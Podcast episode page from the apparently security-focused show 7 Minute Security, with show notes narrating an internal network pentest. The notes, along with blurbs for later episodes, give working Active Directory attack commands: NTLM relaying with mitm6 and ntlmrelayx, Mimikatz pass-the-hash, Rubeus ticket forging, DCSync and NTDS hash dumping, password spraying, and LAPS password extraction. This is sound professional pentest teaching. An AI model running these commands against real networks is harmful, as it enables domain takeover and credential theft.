7MS #455: Tales of Internal Network Pentest Pwnage - Part 24
7 Minute Security19 Feb 2021

7MS #455: Tales of Internal Network Pentest Pwnage - Part 24

Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because:

  • I got to use some of my new CRTP skills!

  • Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users:

Get-DomainUser -PreauthNotRequired

  • Check for misconfigured LAPS installs with Get-LAPSPasswords!

  • The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn +
    ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective!

  • When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!

  • SharpShares is a cool way to find shares your account has access to.

  • I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information

  • Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example:

sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com

Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin!

  • Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun!

  • Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)

Avsnitt(705)

7MS #560: 7MOOCH - Dolphin Rides Are Done Dude

7MS #560: 7MOOCH - Dolphin Rides Are Done Dude

Hey friends, I took a mental health break this week and pre-podcasted this episode of a new series called 7MOOCH: 7 Minutes of Only Chuckles. In today's story, we unpack a situation in Hawaii that made me exclaim the following quite loudly: "Dolphin rides are done, dude!"

17 Feb 202312min

7MS: #559: Tales of Pentest Pwnage - Part 46

7MS: #559: Tales of Pentest Pwnage - Part 46

Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood): Change the Responder.conf file like so: ; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788 Run Responder with --disable-ess flag sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess Use printerbug to coax authentication from a domain controller: sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX Convert hash to make it easier to crack! sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds! Now you can do a Rubeus asktgt with the DC hash: rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!! rubeus.exe ptt /ticket:TICKET GOES HERE Use mimikatz to dump all hashes! mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

10 Feb 202322min

7MS #558: How to Build a Vulnerable Pentest Lab - Part 2

7MS #558: How to Build a Vulnerable Pentest Lab - Part 2

Today we continue part 2 of a series we started a few weeks ago all about building a vulnerable pentesting lab. Check out the video above, and here are the main snippets of code and tips to get you going: Use Youzer to import a bunch of bogus users into your Active Directory: sudo python ./youzer.py --generate --generate_length 20 --ou "ou=Contractors,dc=brifly,dc=us" --domain brifly.us --users 1000 --output lusers.csv Make a Kerberoastable user: New-AdUser -Name "Kerba Roastable" -GivenName "Kerba" -Surname "Roastable" -SamAccountName Kerba -Description "ROASTED!" -Path "OU=Contractors,DC=brifly,DC=us" -AccountPassword (ConvertTo-SecureString "Password1" -AsPlainText -force) -passThru -PasswordNeverExpires $true enable-adaccount Kerba setspn -a IIS_SITE/brifly-dc01.brily.us:77777 briflyus\kerba

7 Feb 202322min

7MS #557: Better Passive Network Visibility Using Teleseer

7MS #557: Better Passive Network Visibility Using Teleseer

Today we're talking about Teleseer, which is an awesome service to give you better network visibility - whether you're on the blue, red or purple team! It all starts with a simple packet capture, and ends with gorgeous visuals and insight into what the heck is on your network and - from a pentester's perspective - delicious vulnerabilities that may lie within!

27 Jan 20237min

7MS #556: How to Build a Vulnerable Pentest Lab

7MS #556: How to Build a Vulnerable Pentest Lab

Today's episode is brought to us by our friends at Blumira! Today we kick off a series all about building your own vulnerable pentest lab from scratch, specifically: Spinning up a domain controller with a few lines of PowerShell Installing Active Directory Domain Services Setting up an intentionally cruddy password policy Baking in the MS14-025 vulnerability P.S. if you're looking for a more automated/push-button solution to get up and going with a lab to play in, check out some of these options: https://github.com/Orange-Cyberdefense/GOAD https://automatedlab.org/en/latest/ https://github.com/microsoft/MSLab https://github.com/davidprowe/BadBlood https://github.com/cliffe/secgen https://github.com/WazeHell/vulnerable-AD

20 Jan 20237min

7MS #555: Light Pentest eBook 1.1 Release

7MS #555: Light Pentest eBook 1.1 Release

Today we're releasing version 1.1 of our Light Pentest eBook. Changes discussed in today's episode (and shown live in the accompanying YouTube video) include: Some typos and bug fixes A new section on finding systems with unconstrained delegation and exploiting them A new section on finding easily pwnable passwords via password spraying A new section relaying credentials with MITM6 (be careful using some of its options - read this New ways (and some words of warning) to dump hashes from Active Directory

13 Jan 20237min

7MS #554: Simple Ways to Test Your SIEM

7MS #554: Simple Ways to Test Your SIEM

Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered: Port scanning nmap 10.0.7.0/24 - basic nmap scan massscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v - scan all 65k+ TCP and UDP ports! Password spraying Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt - try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt Kerberoasting and ASREPRoasting rubeus.exe kerberoast /simple rubeus asreproast /nowrap Key group membership changes net group "GROUP NAME" user-to-add-to-a-group /add Dump Active Directory hashes cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q SMB share hunting Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output - SMB enumeration using PowerHuntShares

6 Jan 202359min

7MS #553: The Artificial Intelligence Throat Burn Episode

7MS #553: The Artificial Intelligence Throat Burn Episode

Hey friends, today's episode is hosted by an AI from Murf.ai because I suffered a throat injury over the holidays and spent Christmas morning in the emergency room! TLDL: I'm fine, but if you want the (sort of) gory details and an update on my condition after my ENT appointment, check out today's episode. Otherwise, we'll see you next week when our regularly scheduled security content continues in 2023. Merry belated Christmas, happy holidays and happiest of new year to you and yours!

30 Dec 20225min

Populärt inom Politik & nyheter

svenska-fall
aftonbladet-krim
motiv
p3-krim
fordomspodden
flashback-forever
rss-viva-fotboll
rss-krimstad
aftonbladet-daily
rss-sanning-konsekvens
spar
blenda-2
rss-krimreportrarna
rss-frandfors-horna
rss-vad-fan-hande
dagens-eko
olyckan-inifran
krimmagasinet
rss-flodet
spotlight